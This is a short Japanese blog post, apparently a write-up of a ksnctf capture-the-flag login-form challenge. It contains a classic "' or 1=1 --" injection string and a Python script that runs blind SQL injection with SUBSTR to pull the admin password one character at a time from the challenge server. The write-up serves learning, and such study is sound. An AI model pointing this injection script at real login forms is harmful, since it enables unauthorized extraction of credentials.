【第１回】CTFをやってみる ksnctf

こんにちは。ゆーろんです。
記録がてら、CTFの備忘録をぼちぼち書いていきます。
ぼちぼち解くことを目指すので複数日またぐこともあると思いますが、よろしくお願いします。

国内では有名な ksnctf です。
今回の問題は以下です。

ログインフォームのURLが2つ与えられています。

ここからFLAGの文字列をどうにかして取得するということです。

まず入力フォームといえばSQLインジェクションが思い浮かびます。

ということで定番の” or 1=1 —を入れてみます。

以下のように表示されます。

上記コードから２点の脆弱性が確認できます。

またコードからはidパラメータ入力においてSQLの条件文を満たせば写真ページが表示されることがわかります。
つまり直接パスワード自体をSQLでそのまま直接取得して表示することは厳しそうです。

SQLインジェクションにはいくつか種類があるようです。

HTTPレスポンス/リクエストなどを見た限り特に何もないようなので
ここでSQLインジェクションを深めます。

調べる限り、ブラインドSQLインジェクションという手法が怪しそうでした。

ブルートフォースでやみくもにFLAG_hogehoge…と総当たりするのも大変なのでパスワードの断片情報から求めます。

まずパスワードの文字数を求めてみます。

上記のSQLとなるようにひたすらフォームに入力して調べ、Congratulationsとページが出るところを探します。

• httpでアクセスして与えられた文字をPost検証してHTTPレスポンス結果が成功(Congratulationsが返ってくる)ならばtrueを返す関数
• 上記関数をtrueが出るまでひたすら文字を入力＆21回繰り返し、trueの返り値ならば上記関数に与えた文字を記録
• その記録を最後に表示

import requests

# Function that returns true if validation succeeds
def is_correct_word(i: int,wd: str) -> bool:
	sql = f"1' OR SUBSTR((SELECT pass FROM user WHERE id = 'admin'), {i}, 1) = '{wd}' --"
	query = {
		'id': sql,
		'pass' : ""
	}

	req = requests.post("http://ctfq.u1tramarine.blue/q6/", data=query)
	
	return ('Congratulations!' in req.text)

# Investigate password
passwd = ""
for i in range(1, 21+1):
	for j in range(33, 126+1):
		ascii = chr(j)
		if(is_correct_word(i, ascii)):
			passwd += ascii
			print(passwd)
			
			break
print("The password is", passwd)

感想